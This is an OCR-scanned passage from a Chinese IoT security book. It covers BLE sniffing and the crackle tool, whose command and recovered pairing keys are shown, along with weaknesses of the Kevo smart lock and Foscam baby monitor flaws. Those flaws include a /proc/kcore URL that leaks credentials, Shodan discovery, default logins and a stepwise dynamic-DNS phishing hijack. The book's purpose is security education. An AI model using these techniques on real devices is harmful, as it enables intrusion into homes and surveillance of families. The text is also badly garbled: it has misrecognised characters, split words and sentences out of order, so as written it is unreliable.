每 个 BLE 数 据 包 包含 一 个 存 取 地 址 (access address, AA) ， 这 是 一 个 具体 连接 的 唯一 标识 符 。 当 设备 发 送 广告 数据 包 时 ， 使 用 固定 的 存 取 地 址 0x8e89bed6 (如 图 2-5 所 


示 ) 。 
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图 2-5: 用 Wireshatk 分 析 BLE 广 告 包 


通过 iPhone 上 一 个 叫 作 LightBlue 的 iOS 应 用 可 以 模拟 BLE 设 备 ， 如 图 2-6 所 示 。 这 对 测试 Ubertooth One 的 功能 非常 有 用 ， 并 确保 抓 包 工具 正在 工作 。 注 意 ， 图 2-5 中 的 
Wireshark 正 在 对 图 2-6 中 名 为 血压 计 的 广告 虚拟 设备 的 数据 包 进 行 抓 包 分 析 。 


研究 人 员 Mike Ryan 在 他 的 白皮书 “蓝牙 : 低能 耗 带 来 的 低 安全 性 ”中 介绍 了 如 何 捕获 BLE 连 接 。 从 本 质 上 讲 ， 使 用 hoplncrement 值 连接 跨越 37 个 预 留用 于 传输 的 信 
道 。nextChannel 值 的 计算 方法 如 下 : 


nextChannel = channel + hopIncrement (mod 37) 


主 设备 和 从 设备 用 这 个 公式 计算 出 并 跳 到 下 一 信道 。 主 、 从 设备 相继 跳 频 传输 一 个 数据 包 。 如 果 没 有 数据 需要 传输 ， 那 他 们 发 出 一 个 无 数据 网 络 包 。 因 此 ， 为 了 嗅 探 BLE 
连接 ， 当 使 用 -f 参 数 抓 包 时 ，ubertooth-btle 工 具 按 照 同样 的 顺序 跳 频 。 
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图 2-6: 用 LightBlue iOS 应 用 程序 模拟 BLE 设 备 
在 Ryan 的 文章 中 ， 他 公开 了 一 个 BLE 的 关键 安全 问题 ， 重 要 的 是 要 理解 BLE 采 用 的 密 钥 交 换 协议 容易 受到 暴力 破解 的 攻击 。 


主 、 从 设备 在 传输 数据 时 可 以 使 用 数据 加 密 来 保护 数据 安全 。 为 了 做 到 这 一 点 ， 就 必须 建立 被 称 为 长 期 密 钥 (long-term key, LTK) 的 共享 秘密 。 在 大 多 数 情 况 下 ， 主 
设备 和 从 设备 在 后 续 的 连接 中 会 重复 使 用 LTK。 通 过 选择 一 个 临时 密 钥 (temporary key, TK) 开始 密 钥 交 换 协 议 ， 这 个 临时 密 钥 是 基于 备 受 推崇 的 高 级 加 密 标准 (AES) th 
议 生成 的 。 


根据 BLE 的 规约 ， 如 果 选 择 了 仅 工作 模式 ， 那 么 TK 的 值 是 0。 这 种 模式 用 于 设备 很 少 或 是 没有 显示 或 输入 机 制 的 时 候 ， 因 此 配对 是 自动 的 。 除 此 以 外 ，TK 使 用 介 于 0 到 
999999 之 间 的 一 个 值 。 更 常见 的 是 在 主 设备 和 从 设备 上 显示 出 生成 的 数字 要 求 用 户 来 确认 。 一 旦 计算 出 TK， 主 、 从 设备 用 TK 生成 一 个 短期 密 钥 (short-term key, STK) 。 
由 STK 最 终生 成 LTK。 


Ryan 发 布 了 一 款 名 为 crackle 的 工具 ， 使 用 抓 到 的 BLE 数 据 包 ， 并 尝试 用 0 到 999999 之 间 的 值 作为 TK 去 暴力 破解 数据 包 。 一 旦 找到 TK， 便 可 以 很 容易 地 通过 TK 解密 验证 
STK。 最 后 ， 可 以 通过 使 用 STK 解 密 获得 LTK。 假 设 捕获 的 数据 包 存 储 在 一 个 名 为 capture.pcap 文 件 中 ， 下 面 是 运行 crackle 工 具 的 命令 : 


[bash]$ crackle -i capture.pcap -o decrypted.pcap 
TK found: 249592 

LTK found: 26db138d0aa63a12dd596228577c4731 

Done, processed 106 total packets, decrypted 19 


像 Wireshark 这 样 的 工具 能 打开 decrypted.pcap 这 种 包含 明文 的 数据 文件 。 需 要 注意 的 是 ，Ryan 的 暴力 破解 方法 不 能 有 效 破 解 带 外 数据 (Out-of-Band, OOB) 模式 ， 
这 种 模式 通过 协议 交换 一 个 128 位 密 铀 ， 不 同 于 BLE 协 议 。 但 大 多 数 设备 使 用 仅 工作 模式 或 6 位 数字 模式 ， 因 此 大 部 分 的 BLE 设 备 是 易 受 攻击 的 。 


任何 研究 BLE 物 联网 设备 的 人 都 应 熟悉 Ryan 的 研究 和 Ubertooth 系 列 工 具 ， 因 为 这 些 是 进行 网 络 流量 分 析 和 对 问题 产品 的 安全 设计 测试 中 不 可 缺少 的 部 分 。 此 外 ， 截 止 到 
写作 本 书 时 ， 目 前 的 蓝牙 规范 (4.1) 仍 没 有 解决 暴力 攻击 问题 ， 所 以 依靠 BLE 加 密 的 设备 依旧 脆弱 。 


2.3.2 ”Kevo 移 动 应 用 程序 不 安全 


图 2-3 中 的 Kwikset Kevo 锁 可 通过 iPhone 上 配套 的 Kevo iOS 应 用 程序 操作 。 


在 第 一 次 启动 时 ， 用 户 被 要 求 指定 一 个 电子 邮件 地 址 和 密码 。 如 图 2-7 所 示 ， 密 码 必须 为 8 个 字符 及 以 上 ， 至 少 包含 1 个 数字 。 


如 图 2-8 所 示 ，Kevo 应 用 程序 采用 了 一 个 策略 ， 如 果 密 码 输 入 错误 6 次 则 锁定 账户 。 锁 定 有 效 期 为 24 小 时 。 


Kevo 


Your password must be at least 
8 characters long and contain at 


least 1 number. 


OK 


图 2-7: Kevo iPhone 应 用 程序 最 低 密 码 要 求 


忘记 密码 的 用 户 必须 正确 回答 账户 相关 的 安全 问题 (如 图 2-9 所 示 ) 。 由 Kevo 应 用 程序 选 出 的 这 些 问题 是 在 用 户 创建 账户 时 提示 用 户 回答 的 。 
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Sign in 
Bad Request! 


Too many failed sign in attempts. For your safety, your account has been 
locked until Tuesday at 10:04 PM. Please contact customer service or reset 


your password to continue. 
Email Address 


Password 


SIGN IN 


Forgot Password? 


图 2-8: Kevo 账 户 输入 错误 6 次 后 被 锁定 


如 果 一 名 恶意 攻击 者 已 经 暂时 获得 了 用 户 的 电子 邮件 账户 ， 便 可 尝试 猜测 答案 或 通过 网 络 钓鱼 攻击 用 社会 工程 学 方法 获得 密码 。 与 此 同时 ，Kevo 应 用 程序 就 密码 的 复杂 
性 做 了 出 色 的 工作 ， 采 用 锁定 策略 并 要 求 回答 安全 问题 ， 但 用 户 应 该 认识 到 ， 这 些 信息 可 经 常 通过 钓鱼 攻击 和 恶意 软件 的 方法 窃取 到 。 


该 锁 还 实现 了 一 种 机 制 ， 允 许 用户 向 其 他 人 发 送 电 子 密 铀 。 你 只 要 提供 个 人 的 电子 邮件 地 址 ， 对 方 就 会 收 到 一 封 来 自 Kevo 的 电子 邮件 ， 如 图 2-10 所 示 。 要 打开 锁 ， 对 方 
必须 先 用 Kevo iPhone 应 用 程序 建立 一 个 账户 ， 并 验证 自己 的 电子 邮件 地 址 。 
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Answer Security Question 


What is the name of your favorite childhood 
friend? 
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图 2-9: Kevo 重 置 密码 的 安全 问题 


这 里 的 安全 风险 是 犯罪 分 子 可 能 临时 获得 攻击 目标 的 电子 邮件 账户 。 由 于 被 攻击 目标 必须 建立 一 个 新 账户 ， 并 回答 有 关注 册 的 安全 问题 ， 犯 罪 分 子 可 以 输入 任意 的 安全 问 
题 答 案 ， 这 将 反 过 来 锁定 正在 重 置 密码 的 合法 用 户 。 


从 房 门 里 面 抬 起 门 锁 上 面 的 盖子 很 容易 发 现 一 个 编程 按钮 。 如 图 2-11 所 示 ， 用 户 按 下 这 个 按钮 并 在 锁 旁 边 拿 着 电话 用 它 打 开门 锁 。 一 旦 设置 好 ， 用 户 需要 触摸 门 锁 外 面 的 
面板 唤醒 门 锁 。 这 时 ， 当 门 锁 在 附近 发 现 一 个 预 编 程 授权 的 iPhone， 门 锁 和 iPhone 就 可 以 通过 BLE 通 信 实 现 打开 (或 锁 上 ) 。 
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Nitesh has sent you a Kevo eKey 


New To Kevo? 


Download the Kevo App and enjoy Touch-to-Open 
convenience. 


Open the app and create an account using 
Q yahoo.com as your email. 


e Accept your Pending eKey in the Kevo App. 


e» Touch Nitesh's Kevo lock to unlock. It's that simple! 


图 2-10: 向 外 部 发 送 电 子 钥匙 


然而 ， 有 人 用 一 部 从 未 授权 的 新 iPhone， 只 需 下 载 Kevo 应 用 程序 并 猜 到 或 获取 到 密码 ， 登 录 到 应 用 程序 后 就 能 开锁 。 虽 然 应 用 程序 实现 了 控制 密码 的 安全 机 制 ， 但 要 做 
到 让 门 锁 更 安全 ， 可 以 在 即使 知道 密码 的 情况 下 仍 需要 新 设备 使 用 编程 按钮 来 配对 。 


这 给 我 们 带 来 对 锁 本 身 的 物理 接触 的 问题 。 我 们 知道 使 用 各 种 方法 撞 锁 开门 是 一 项 技艺 ， 有 些 人 非常 擅长 。 事 实 上 ， 对 Kevo 锁 进行 撞 锁 开门 测试 ， 人 们 可 以 绕 开 物理 钥 
匙 的 机 制 |。 


物理 撞 锁 是 一 个 人 们 熟知 的 影响 很 多 锁 的 问题 ， 除 此 之 外 ， 移 动 应 用 程序 功能 应 用 在 Kevo 锁 上 ， 人 们 可 以 用 iPhone 和 临时 物理 接触 门 锁 ， 在 几 秘 钟 之 内 重新 给 锁 编程 ， 
使 其 关联 上 一 个 新 设备 一 一 实际 上 ， 这 是 一 种 虚拟 撞 锁 。 通 过 按 住 重 置 按钮 几 秒 钟 ， 如 图 2-12 所 示 ， 然 后 一 步 步 按照 图 2-11 中 那样 就 可 以 关联 新 的 设备 了 。 | 临时 物理 接触 门 
锁 的 人 不 需要 有 物理 撞 锁 的 技能 ， 也 不 需要 额外 的 训练 和 工具 ， 就 可 以 很 容易 地 做 到 这 些 。 


ILLI ATAT F 


1 Remove the battery 
cover. 


2 Press and release 
the Program button. 


3 Hold your phone 
close against the 
back panel. 


图 2-11: 用 锁 上 的 编程 按钮 关联 iPhone 


注意 ， 这 个 人 必须 进 到 被 保护 的 场所 内 才 可 以 ， 因 为 重 置 和 编程 按钮 是 朝向 里 面 的 。 然 而 ， 仍 有 一 种 风险 ， 临 时 工 或 拜访 者 可 以 滥用 这 个 功能 下 次 不 请 自 入 。 或 更 有 其 
者 ， 他 们 把 电子 钥匙 发 给 其 他 人 。 


本 节 提 供 了 一 个 很 好 的 例子 ， 我 们 应 当 仔细 考虑 这 个 问题 ， 我 们 越 来 越 依赖 移动 应 用 程序 来 保障 我 们 的 人 身 安 全 。 密 码 猜测 和 钓鱼 攻击 常 被 用 来 攻击 我 们 的 数字 信息 ， 但 
如 同 Kevo iPhone 应 用 程序 一 样 ， 平 台 上 相同 的 攻击 可 能 会 破坏 家 庭 和 办 公 室 的 物理 安全 。 
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图 2-12: 门 锁 上 的 重 置 按钮 


锁 制 造 商 需要 有 更 强 的 意识 认识 到 这 些 威胁 ， 并 实施 更 严格 的 控制 。 由 于 物 联网 设备 固件 的 物理 性 质 ， 事 实 上 情况 很 复杂 ， 即 便 使 用 应 用 程序 界面 提供 升级 ， 许 多 用 户 为 
了 节约 时 间 ， 都 会 延迟 升级 。 他 们 不 想 在 离开 家 或 回 家 的 时 候 还 等 待 门 锁 处 理 安 全 补丁 安装 。 


这 意味 着 : 基于 物 联网 的 设备 制造 商 如 Kevo， 必 须 力争 在 其 产品 的 初始 版 本 实现 正确 的 安全 功能 。 这 很 不 容易 ， 因 为 安全 是 很 难 完美 的 ， 所 以 使 用 这 些 设备 的 用 户 应 该 
意识 到 潜在 的 风险 ， 正 如 本 节 所 描述 的 。 


2.4 小 结 


人 类 渴求 保护 财产 、 隐 私 和 和 人身 安全 是 可 以 理解 的 。 我 们 几 干 年 前 就 发 明了 门 锁 ， 至 今 仍 依赖 门 和 锁 保护 我 们 的 生活 空间 。 


即便 是 对 最 好 的 门 锁 滥用 开锁 工具 ， 对 我 们 大 多 数 人 来 说 都 不 算是 新 闻 了 。 然 而 ， 随 着 电子 门 锁 在 物 联网 中 的 出 现 ， 我 们 必须 认识 到 从 安全 角度 出 发 作出 的 决定 如 何 深远 
影响 我 们 的 未 来 。 


在 Onity 门 锁 的 例子 中 ,我们 展现 了 一 个 不 良 的 安全 设计 如 何 置 百 万 房屋 于 危险 之 中 ， 这 一 情况 又 如 何 被 各 种 窃贼 加 以 利用 。 还 有 一 个 例子 ， 当 人 们 不 得 不 对 数 以 百 万 计 
的 门 锁 人 工 进 行 升级 ， 这 将 是 非常 昂贵 的 安全 补丁 。 另 外 ，Onity 的 例子 对 门 锁 制 造 商 来 说 是 个 教训 ， 他 们 应 该 对 客户 更 加 透明 ， 并 与 独立 安全 研究 人 员 合作 解决 安全 问题 。 


Z-Wave 的 例子 说 明了 网 络 协议 设计 者 是 如 何在 不 经 意 间 将 门 锁 至 于 风险 之 中 的 ， 人 们 能 够 通过 简单 的 硬件 和 软件 工具 任意 地 开门 。 当 考虑 到 物 联网 安全 问题 时 ， 我 们 应 
该 包括 和 检查 部 署 的 设计 原则 ， 这 些 设计 原则 不 仅 是 终端 生产 商 使 用 的 ， 也 是 那些 提供 使 这 些 设备 运行 的 SDK 和 协议 的 组 织 所 需要 使 用 的 。 


最 后 ， 在 BLE 的 例子 中 ， 我 们 看 到 Mike Ryan 的 重要 研究 表明 : 通过 协议 暴力 破解 连接 致使 很 多 设备 处 于 危险 之 中 。 另 外 ， 我 们 简 述 了 具有 用 iPhone 开锁 功能 的 Kevo 门 
锁 的 设计 问题 ， 这 一 特性 提供 了 传统 的 攻击 方式 ， 如 密码 猜测 和 网 络 钓鱼 攻击 。 我 们 也 看 到 了 重新 编程 门 锁 的 功能 可 看 作 是 一 种 虚拟 援 锁 : 在 这 种 情况 下 ， 犯 罪 分 子 只 需要 简 
单 地 物理 接触 门 锁 ， 用 一 个 iPhone 代 蔡 专门 的 援 锁 工具 和 援 锁 教程 。 


我 们 期 待 着 一 个 美好 的 未 来 ， 用 以 物 联网 为 基础 的 生态 系统 提高 我 们 的 生活 质量 ， 并 帮助 我 们 保护 个 人 空间 。 本 章 概 述 了 市 场 上 流行 的 门 锁 的 情况 ， 并 研究 证 明了 其 中 一 
些 门 锁 脆弱 的 安全 机 制 。 这 些 我 们 今天 纠正 物 联 网 门 锁 安全 隐患 的 经 验 教训 会 成 为 我 们 继续 改进 未 来 生活 中 的 设备 的 基础 。 


第 3 章 ”攻击 无 线 护士 站 一 一 破坏 婴儿 监视 器 和 其 他 设施 


理 查 德 . 豪 普 特 曼 (Richard Hauptmann) 是 一 位 绅士 ， 拥 有 一 辆 车 牌 为 4U-13-41-N.Y 的 蓝 色 道奇 轿车 。 他 被 指控 并 被 认定 绑架 谋杀 了 著名 飞行 员 查 尔 斯 : 林 德 伯 格 
(Charles Lindberg) 和 安妮 . 莫 罗 . 林 德 伯 格 (Anne Morrow Lindbergh) 夫妇 20 个 月 大 的 儿子 一 一 查尔斯 - 林 德 伯 格 : 奥 古 斯 (Charles Augustus Lindbergh Jr.) 。 


1932 年 3 月 1 日 晚上 ， 小 孩 在 位 于 新 泽 西 州 东方 美佳 的 家 中 遭 到 了 绑架 。 两 个 月 后 ， 人 们 发 现 了 他 的 尸体 。 死 亡 原因 是 严重 的 脑 骨 骨 折 。 调 查 伦 了 2 年 时 间 ，25 万 张 赎金 中 
包含 的 纸币 进入 纽约 市 流通 。Hauptmann 最 后 落网 是 由 于 一 名 银行 出 纳 员 发 现 了 其 中 一 张 纸币 ， 在 纸币 的 空白 处 标 有 Hauptmann 的 车 牌号 。 很 明显 ， 一 个 加 油 站 的 老板 发 
现 他 的 某 个 客户 行为 可 疑 ， 怀 疑 他 支付 假币 ， 就 在 开具 发 票 时 将 这 名 客户 的 车 牌号 写 在 了 纸币 空白 处 。 


后 来 ， 林 德 伯 格 绑架 案 广为人知 ， 对 案情 的 结论 也 是 众说 纷 经 。 该 案件 导致 的 一 个 结果 是 有 人 开发 出 了 首 个 婴儿 监视 器 ， 取 名 为 “无 线 护 士 ” (Radio Nurse) ， 该 监视 
器 是 由 Zenith 公 司 开 发 研制 的 。Zenith 公 司 总 裁 Eugene F.McDonald 上 .觉得 必须 给 出 一 个 解决 办 法 有 效 地 减少 这 类 案件 的 发 生 ， 为 此 他 要 求 Zenith 公 司 的 工程 师 开 发 了 这 款 
品 。 产 品 的 最 终 设计 包含 了 一 个 “监护 人 耳 洒 ” (Guardian Ear) 发 射 器 ， 该 发 射 器 放置 在 婴儿 床 附近 ， 一 个 名 为 “无 线 护士 ”的 接收 装置 则 放置 在 家 长 或 监护 人 的 周围 。 


婴儿 监视 器 这 个 想法 看 上 去 很 自然 ， 但 是 如 果 没 有 Lindbergh 案 件 的 启发 ， 谁 会 想到 要 设计 这 样 的 产品 呢 ? TUE 
能 力 的 这 一 重要 需求 。 本 质 上 来 讲 ， 婴 儿 监 视 器 可 视 为 潜在 的 救生 设备 。 


Tnm 


要 的 是 ， 婴 儿 监 视 器 满足 了 提升 家 长 在 远 处 照看 亲人 


鉴于 婴儿 监控 器 是 父母 和 监护 人 的 重要 依靠 ， 因 此 必须 考虑 这 些 设备 的 安全 性 ， 确 保 它们 不 包含 导致 安全 或 隐私 泄露 的 缺陷 ， 这 是 非常 重要 的 。 传 统 的 婴儿 监视 器 依靠 范 
围 有 限 的 无 线 电波 工作 ， 而 新 一 代 产 品 是 基于 物 联网 技术 ， 比 如 Foscam 婴 儿 监 视 器 和 BelkinWeMo Baby。 这 些 设备 连 入 WiFi 匹 线 网 络 ， 人 允许 监护 人 在 世界 各 地 进行 监听 。 
本 章 ， 我 们 就 来 看 一 看 涉及 这 类 设备 的 安全 及 隐私 问题 ， 揭 示 新 一 代 婴 儿 监 视 器 相关 的 安全 风险 。 这 也 会 帮助 我 们 在 当前 和 未 来 的 产品 中 找到 限制 攻击 的 方法 。 


我 们 也 会 研究 一 下 另 一 款 由 Belkin 设 计 的 产品 : WeMo Switch， 这 是 一 款 可 用 于 远程 开启 或 关闭 电源 的 连接 设备 。 我 们 的 目的 是 从 安全 的 角度 研究 同一 家 公司 设计 的 产 
品 的 相似 之 处 和 不 同 之 处 。 由 于 同一 家 公司 的 企业 架构 存在 着 文化 协同 效应 ， 因 此 类 似 的 安全 问题 往往 存在 于 不 同 的 产品 之 中 。 


3.1 Foscam 事 件 


无 绳 电话 流行 于 20 世 纪 80 年 代 ~ 90 年代 ， 任 何 一 个 用 过 无 绳 电话 的 人 ， 都 可 以 滔滔 不 绝地 讲述 无 绳 电话 之 间 相 互 干扰 的 问题 。 许 多 人 都 经 历 过 他 们 的 无 绳 电话 接收 临近 
无 绳 电话 的 信号 这 样 的 事情 。 这 是 因为 早期 的 无 绳 电话 都 工作 在 固定 无 线 电 频率 上 。 刚 开始 ， 大 家 都 认为 附近 的 人 不 可 能 拥有 相似 的 无 绳 电话 ， 所 以 当时 间 题 也 不 是 太 大 。 后 
来 ， 引 入 了 数字 扩 频 ， 信 息 分 布 到 了 不 同 频率 上 ， 因 此 互相 干扰 的 情况 变 得 更 加 突出 了 。 


大 多 数 传统 的 婴儿 监控 器 都 工作 在 模拟 频段 上 ， 任 何人 都 可 以 很 轻松 地 使 用 无 线 扫描 仪 收听 到 这 些 频段 上 的 信息 。 涉 及 婴儿 监控 器 时 ， 窃 听 或 许 是 最 大 的 隐忧。 最 初 ， 没 
有 几 个 人 意识 到 任何 人 只 需 购买 一 个 简单 的 无 线 扫描 仪 就 可 以 窃听 信息 。 但 是 ， 要 窃听 传统 的 婴儿 监控 器 ， 需 要 将 窃听 器 放置 在 离 家 不 远 的 地 方 ， 这 也 就 降低 了 侵犯 隐私 的 概 


技术 快速 发 展 的 今天 ， 许 多 流行 的 婴儿 监控 器 不 再 使 用 无 线 频率 了 。 它 们 转 而 依靠 WiFi 网 络 ， 让 用 户 在 世界 各 地 进行 远程 监听 。 这 一 趋势 极 大 地 增加 了 安全 缺陷 被 利用 的 
可 能 性 。 如 果 设 备 接 入 了 因特网 ， 世 界 上 任何 使 用 计算 机 的 人 都 有 可 能 实施 窃听 攻击 。 接 下 来 ， 我 们 要 讨论 发 生 这 种 攻击 的 一 个 具体 事件 。 然 后 ， 我 看 看 攻击 中 所 用 设备 的 安 
全 漏洞 是 什么 样 的 。 最 后 ， 再 讨论 另 一 款 婴 儿 监 控 器 : Belkin WeMo Baby， 剖 析 其 技术 设计 方案 ， 讨 论 如 何 改进 其 潜在 的 安全 漏洞 。 


2013 年 8 月 ， 马 克 : 吉 尔 伯 特 (Mark Gilbert) 正在 家 中 做 菜 ， 突 然 听 到 从 他 正 熟睡 的 女儿 卧室 中 传 出 的 吐 杂 声 。 当 Mark 和 他 妻子 走向 卧室 时 ， 他 们 听 到 一 个 陌生 人 正在 
齐 吕 他们， 称 马克 是 “ 轧 夺 的 白痴 ”。， 称 他 妻子 是 “ 寻 子 ”。Mark 注 意 到 婴儿 监控 器 的 摄像 头 正 转 向 他 和 他 妻子 。 这 时 ， 他 意识 到 入 侵 者 控制 了 这 人 台 设 备 ， 于 是 赶紧 切断 了 


设备 连接 。 


考虑 一 下 ， 这 件 事 情 对 于 Gilbert 一 家 来 说 是 一 件 多 么 严重 ， 多 么 令 人 不 安 的 事情 啊 。 想 象 一 下 ， 这 样 的 入 侵 一 定 会 让 人 觉得 一 天 安静 的 生活 就 此 结束 了 ， 一 个 完全 陌生 
的 、 喊 着 脏话 的 声音 充斥 在 我 们 所 谓 的 私密 的 家 中 。 想 象 一 下 ， 来 自 婴 儿 卧 室 的 这 种 口头 攻击 会 给 家 人 带 来 什么 样 的 打击 。 


乍 一 看 ， 人 们 可 能 以 为 Mark Gilbert 在 WiFi 网 络 中 使 用 了 弱 密 码 ， 可 能 入 侵 者 就 在 他 家 附近 并 猜 出 了 密码 。 或 者 可 能 Mark 根 本 就 没有 修改 默认 认证 (用户 名 默认 
是 “admin”， 密 码 默 认 是 空 ) ， 导 致 入 侵 者 很 轻松 地 访问 了 婴儿 监控 器 。 然 而 ， 根 据 Mark 的 描述 ， 他 确信 修改 了 默认 认证 ， 为 了 安全 ， 还 使 用 了 强 密码 接 入 WiFi。 


3.1.1 研究 发 现 Foscam 漏 洞 


Gilbert 事 件 发 生 几 周 之 后 ， 安 全 研究 人 员 终 于 明白 了 ， 问 题 的 原因 出 在 Foscam 公 司 制 造 的 设备 上 ， 该 公司 的 安全 研究 人 员 早 在 几 个 月 前 就 在 Hack in the Box 会 议 上 将 
该 产品 漏洞 公之于众 了 。 图 3-1 展 示 了 Foscam 的 一 款 有 问题 的 设备 。 


图 3-1: Foscam 婴 儿 监 控 设 备 


研究 人 员 发 现 ， 攻 击 者 只 需 简单 访问 下 面 的 URL 地 址 ， 下 载 设备 完整 内 存 ， 就 能 够 确认 婴儿 监控 设备 的 |P 地 址 是 多 少 : 


http://[IP Address]/proc/kcore 


获取 kcore 文 件 后 ， 攻 击 者 可 以 很 轻松 地 使 用 16 进 制 编辑 软件 打开 该 文件 ， 获 取 用 户 名 和 密码 。 拥 有 了 这 些 认证 信息 之 后 ， 攻 击 者 就 可 以 控制 摄像 头 了 。Gilbert 事 件 的 攻 
击 者 很 有 可 能 就 是 利用 了 这 一 漏洞 。 


3.1.2 ”使 用 shodan 找 到 互联 网 上 的 婴儿 监控 器 


眼下 的 问题 是 : 攻击 者 是 如 何 定位 到 互联 网 上 某 个 特定 的 婴儿 监控 器 的 。 首 先 ， 在 互联 网 上 有 数 以 百 万 计 的 这 类 设备 ， 而 且 数 量 还 在 增长 。 一 种 可 能 是 攻击 者 使 用 了 搜索 
引擎 Shodan， 它 可 以 很 容易 地 定位 接 入 互联 网 的 各 种 类 别 的 设备 。 如 图 3-2 所 示 ，Shodan 可 以 发 现 路 由 器 、 服 务 器 ， 以 及 一 系列 使 用 各 种 过 滤 设备 接 入 互联 网 的 设备 。 


Shodan 可 以 持续 不 断 地 定位 和 查询 遍布 于 互联 网 上 的 设备 ， 以 索引 运行 在 这 些 设备 上 的 服务 。 
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图 3-2: 搜索 引擎 Shodan 


据 一 篇 题 为 “Exploiting Foscam IP Cameras" (攻击 Foscam IP 摄像 机 ) 的 论文 研究 发 现 : 运行 在 Foscam 设 备 上 的 Web 服 务 器 在 发 送 HTTP 响 应 信息 时 ， 在 Server 字 
段 以 Netwave IP Camera (最 新 版 的 Foscam 设 备 ， 其 固件 采用 Boa/0.94.13) 作为 返回 值 。 使 用 这 一 信息 ， 借 助 Shhodan 很 容易 就 能 找到 Foscam 设 备 的 IP 地 址 ， 如 图 3-3 所 
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如 图 3-3 中 Shodan 的 查询 情况 ， 约 有 70 万 个 IP 设 备 马上 对 我 们 的 查询 做 出 了 响应 。 这 说 明 : 攻击 者 定位 如 Foscam 婴 儿 监 控 器 这 类 设备 ， 利 用 已 知 漏洞 实施 攻击 是 多 么 得 
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图 3-3: Shodan 查 询 定 位 互联 网 上 的 Foscam 设 备 


3.1.3 “利用 默认 凭证 


我 们 知道 Foscam 设 备 使 用 admin 作 为 默认 用 户 名 ， 默 认 密 码 为 空 ， 大 多 数 用 户 可 能 保留 此 默认 设置 而 不 做 修改 (除非 在 安装 过 程 中 要 求 用 户 选择 一 个 强 密码 ， 但 是 在 存 
在 漏洞 版 本 的 Foscam 设 备 中 ， 并 没有 做 这 样 的 要 求 ) 。 一 个 简单 的 Shodan 查 询 就 能 够 显示 出 存在 着 巨大 数量 的 个 人 和 组 织 ， 他 们 根本 就 没有 意识 到 他 们 的 隐私 很 容易 被 汇 


2013 年 8 月 ，Foscam 发 布 了 一 个 升级 版 ， 要 求 用 户 修改 默认 的 空 密码 ， 人 允许 用 户 选择 一 个 用 户 名 而 不 是 默认 采用 admin 作 为 用 户 名 。 然 而 ， 如 图 3-4 所 示 ， 用 户 必 须 自己 
动手 访问 软件 更 新 地 址 ， 然 后 使 用 web 接 口 执 行 更 新 。 不 难 想象 ， 大 多 数 用 户 并 不 知道 有 安全 更 新 这 么 一 回 事 。 
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Hi, everyone! 


We are pleased to let you know that the latest firmwares for the 
FI9801W, FI9802W and FI9818W are available for download. 

The direct download link is as follows: 

Official download center: http:/ /www.foscam.com/down3.aspx 


Fixed issues: 

1). Fixed the issue sometimes few cameras will stop uploading 
alarm images to FTP after several hours; 

2). Fixed the issue can only add one host name even a 2nd one 
with a different port. 


Improvements: 

1).Enhance security to prompt user change the default blank 
login password; 

2). Enable to change the default username "admin"; 

3). Add the feature to include the camera name when sending 
the test email; 

4). Redefine the Medium and Low sensitivities to more lower for 
motion detection; 

5). Extended character length limit for passwords; 

6). Feedback the reason for the failure when do the email test; 
7). Feedback the reason for the failure when do the FTP test; 
8). More friendly web UI. 


Before upgrading the firmware, please read the file named 
Upgrade Guidance in each zip package. 

We highly recommend you upgrade your website firmware to the 
latest firmware. 


图 3-4: Foscam 发 布 的 固件 更 新 需要 手工 执行 


在 用 户 习惯 于 使 用 可 自动 更 新 的 移动 和 桌面 设备 的 时 代 ， 也 很 容易 想象 得 到 ， 人 们 即使 意识 到 可 以 更 新 了 ， 也 可 能 不 去 执行 更 新 ， 因 为 这 需要 用 户 下 载 文件 并 手动 执行 更 
新 操作 。 这 一 点 在 刚才 我 们 提 到 的 论文 “Exploiting Foscam IP Cameras” 中 得 到 了 证 实 ， 在 这 篇 论文 中 作者 给 出 了 这 样 的 结论 : “我 们 发 现 ， 没 有 一 台 摄像 机 采用 了 
Foscam 提 供 的 最 新 固件 。 这 可 能 说 明知 道 要 打 补 丁 的 终端 用 户 可 能 有 更 好 的 办 法 将 IP 报 像 机 接 入 互联 网 ， 也 可 能 说 明 没 有 人 给 他 们 的 摄像 机 打 补 丁 ”。 


3.1.4. 利用 动态 DNS 


除了 弱 认 证 机 制 以 外 ，“Exploiting Foscam IP Cameras” 还 提 到 了 在 Foscam 设 备 中 还 存在 一 个 漏洞 ， 该 漏洞 与 动态 DNS 特性 有 关 。 每 一 个 Foscam 设 备 都 包含 一 个 唯 


一 6 位 字符 用 户 名 (采用 Xx#### 格 式 ，x 表 示 字符 ，# 表 示 数 字 ) ， 这 个 用 户 名 会 
用 户 名 和 密码 。 


印 在 摄像 机 的 固定 标签 上 。 这 个 静态 值 也 会 被 刷 入 设备 的 内 存 中 ， 同 时 作为 动态 DNS 特性 的 


这 一 特性 在 本 质 上 是 允许 每 一 台 摄 像 机 更 新 它 的 |P 地 址 以 指向 xx####.myfoscam.org 的 主机 名 (已 发 现 的 有 效 主机 名 范围 在 aa0000 到 ep9310 之 间 ) 。 这 就 允许 用 户 不 在 
家 的 时 候 都 可 以 使 用 web 浏 览 器 登录 摄像 机 ， 而 不 需要 非得 记 住 |P 地 址 。 用 户 只 需要 记 住 与 nyfoscam.org 动 态 域名 服务 关联 的 主机 名 就 可 以 了 。 


Foscam 设 备 采 用 UDP 协议 ， 通 过 向 Foscam 服 务 器 发 送 UDP 报 文 来 更 新 主机 名 映射 。UDP 报 文中 包含 设备 的 用 户 名 和 密码 ， 值 都 是 主机 名 。 “Exploiting Foscam IP 


Cameras” 论 文中 描述 了 攻击 者 利用 上 述 内 容 执行 钓鱼 攻击 的 步骤 : 


1. 攻 击 者 在 aa0000 到 ep9310 范 围 内 选择 一 个 主机 名 ， 然 后 通过 ns1.myfoscam.org 网 站 查询 该 主机 名 所 属 设备 对 应 的 当前 IP 地 址 。 这 里 ， 我 们 假定 选 定 的 目标 是 


aa0000。 


2. 攻 击 者 向 Foscam 服 务 器 发 送 一 个 含有 用 户 名 值 和 密码 值 都 是 aa0000 的 数 和 


28. 


3.Foscam 服 务 更 新 它 的 动态 DNS 记录 ， 将 aa0000 指 向 数据 包 的 源 I|P 地 址 ， 即 攻击 者 的 I|P 地 址 。 


4 攻击 者 在 该 |P 地 址 上 运行 一 个 web 服 务 器 ， 该 服务 端 看 上 去 跟 Foscam 界 面 一 模 一 样 。 


5. 攻 击 者 等 待 设备 的 拥有 者 浏览 aa0000.myfoscam.org， 这 会 导致 用 户 连接 


6. 被 攻击 者 输入 他 的 认证 信息 ， 这 些 信息 就 会 被 攻击 者 捕获 。 


到 攻击 者 的 web 界 面 上 ， 而 不 是 用 户 自己 实际 的 web 服 务 器 界面 上 。 


